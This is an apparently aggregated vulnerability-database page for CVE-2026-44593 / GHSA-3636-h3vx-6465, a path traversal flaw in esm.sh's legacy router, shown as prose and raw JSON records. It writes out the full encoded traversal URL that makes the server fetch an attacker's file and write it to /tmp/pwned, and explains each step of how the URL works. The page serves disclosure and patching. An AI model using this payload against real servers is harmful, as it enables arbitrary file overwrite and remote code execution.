Vulnerability-Lookup

GHSA-3636-H3VX-6465

Vulnerability from github – Published: 2026-05-12 22:22 – Updated: 2026-05-12 22:22

Summary

esm.sh: Legacy Route Path Traversal Can Lead to RCE

Details

Impact

Arbitrary File Write – An attacker can cause the server to write data to any file path it has write permission for.
Privilege Escalation / RCE – By overwriting critical binaries or scripts, the attacker can execute arbitrary code with the server’s privileges.

Exploit

The legacy router first retrieves a response from legacyServer, parses the incoming request path, and ultimately writes the data to storage via buildStorage.Put
(see https://github.com/esm-dev/esm.sh/blob/4312ae93e518121e764a18bb521af12e490ef137/server/legacy_router.go#L291).

For a URL such as:

http://ESM_SH_HOST/v111/react@19.2.0/esnext/..%2f..%2f..%2fgh/<attacker>/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned

the router concatenates the path components without sanitizing them, producing a storage key like:

legacy/v111/react@19.2.0/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned

When this key is used, the underlying file system resolves the relative segments and writes the file to /tmp/pwned. Thus an attacker can craft a request that writes data to arbitrary locations on the server.

Details

URL Construction
A crafted request is sent to the server: http://ESM_SH_HOST/v111/react@19.2.0/esnext/..%2f..%2f..%2fgh/<attacker>/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned
Proxy to Legacy Server
The request is forwarded to: http://legacy.esm.sh/v111/react@19.2.0/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../tmp/pwned which resolves to: http://legacy.esm.sh/gh/<attacker>/exp@1171e85d5d/foo.md
File Retrieval
The server fetches foo.md from the GitHub repository https://github.com/<attacker>/exp.
Path Normalisation & Storage
The storage path derived from the request is: legacy/v111/react@19.2.0/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned Normalising this path yields /tmp/pwned. The retrieved file content is then written to that location.
Result
By repeating this pattern, an attacker can overwrite arbitrary binaries or scripts on the server, paving the way for remote code execution.

Credit Discovery To

splitline (@_splitline_) from DEVCORE Research Team

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/esm-dev/esm.sh"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260508100112-1960055e1d53"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44593"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-12T22:22:39Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Impact\n- Arbitrary File Write \u2013 An attacker can cause the server to write data to any file path it has write permission for.\n- Privilege Escalation / RCE \u2013 By overwriting critical binaries or scripts, the attacker can execute arbitrary code with the server\u2019s privileges.\n\n### Exploit\n\nThe legacy router first retrieves a response from `legacyServer`, parses the incoming request path, and ultimately writes the data to storage via `buildStorage.Put`  \n(see \u003chttps://github.com/esm-dev/esm.sh/blob/4312ae93e518121e764a18bb521af12e490ef137/server/legacy_router.go#L291\u003e).\n\nFor a URL such as:\n\n```\nhttp://ESM_SH_HOST/v111/react@19.2.0/esnext/..%2f..%2f..%2fgh/\u003cattacker\u003e/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned\n```\n\nthe router concatenates the path components without sanitizing them, producing a storage key like:\n\n```\nlegacy/v111/react@19.2.0/esnext/../../../gh/\u003cattacker\u003e/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned\n```\n\nWhen this key is used, the underlying file system resolves the relative segments and writes the file to `/tmp/pwned`. Thus an attacker can craft a request that writes data to arbitrary locations on the server.\n\n\n### Details\n\n1. **URL Construction**  \n   A crafted request is sent to the server:\n   ```\n   http://ESM_SH_HOST/v111/react@19.2.0/esnext/..%2f..%2f..%2fgh/\u003cattacker\u003e/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned\n   ```\n\n2. **Proxy to Legacy Server**  \n   The request is forwarded to:\n   ```\n   http://legacy.esm.sh/v111/react@19.2.0/esnext/../../../gh/\u003cattacker\u003e/exp@1171e85d5d/foo.md#/../../../../../../../tmp/pwned\n   ```\n   which resolves to:\n   ```\n   http://legacy.esm.sh/gh/\u003cattacker\u003e/exp@1171e85d5d/foo.md\n   ```\n\n3. **File Retrieval**  \n   The server fetches `foo.md` from the GitHub repository `https://github.com/\u003cattacker\u003e/exp`.\n\n4. **Path Normalisation \u0026 Storage**  \n   The storage path derived from the request is:\n   ```\n   legacy/v111/react@19.2.0/esnext/../../../gh/\u003cattacker\u003e/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned\n   ```\n   Normalising this path yields `/tmp/pwned`. The retrieved file content is then written to that location.\n\n5. **Result**  \n   By repeating this pattern, an attacker can overwrite arbitrary binaries or scripts on the server, paving the way for remote code execution.\n\n\n### Credit Discovery To\nsplitline (@\\_splitline\\_) from DEVCORE Research Team",
  "id": "GHSA-3636-h3vx-6465",
  "modified": "2026-05-12T22:22:39Z",
  "published": "2026-05-12T22:22:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-3636-h3vx-6465"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/esm-dev/esm.sh"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esm-dev/esm.sh/releases/tag/v137_3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "esm.sh: Legacy Route Path Traversal Can Lead to RCE"
}

CVE-2026-44593 (GCVE-0-2026-44593)

Vulnerability from cvelistv5 – Published: 2026-05-28 14:44 – Updated: 2026-05-28 14:44

Title

esm.sh: Legacy Route Path Traversal Can Lead to RCE

Summary

esm.sh is a no-build content delivery network (CDN) for web development. In 137 and earlier, the legacy router first retrieves a response from legacyServer, parses the incoming request path, and ultimately writes the data to storage via buildStorage.Put. The router concatenates the path components without sanitizing them, producing a storage key. When this key is used, the underlying file system resolves the relative segments and writes the file to the specified path. Thus an attacker can craft a request that writes data to arbitrary locations on the server.

Severity

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/esm-dev/esm.sh/security/adviso…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
esm-dev	esm.sh	Affected: <= 137

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "esm.sh",
          "vendor": "esm-dev",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 137"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "esm.sh is a no-build content delivery network (CDN) for web development. In 137 and earlier, the legacy router first retrieves a response from legacyServer, parses the incoming request path, and ultimately writes the data to storage via buildStorage.Put. The router concatenates the path components without sanitizing them, producing a storage key. When this key is used, the underlying file system resolves the relative segments and writes the file to the specified path. Thus an attacker can craft a request that writes data to arbitrary locations on the server."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-28T14:44:20.782Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-3636-h3vx-6465",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-3636-h3vx-6465"
        }
      ],
      "source": {
        "advisory": "GHSA-3636-h3vx-6465",
        "discovery": "UNKNOWN"
      },
      "title": "esm.sh: Legacy Route Path Traversal Can Lead to RCE"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-44593",
    "datePublished": "2026-05-28T14:44:20.782Z",
    "dateReserved": "2026-05-06T21:49:12.425Z",
    "dateUpdated": "2026-05-28T14:44:20.782Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-3636-H3VX-6465

Impact

Exploit

Details

Credit Discovery To

CVE-2026-44593 (GCVE-0-2026-44593)

Tags

Sightings

Nomenclature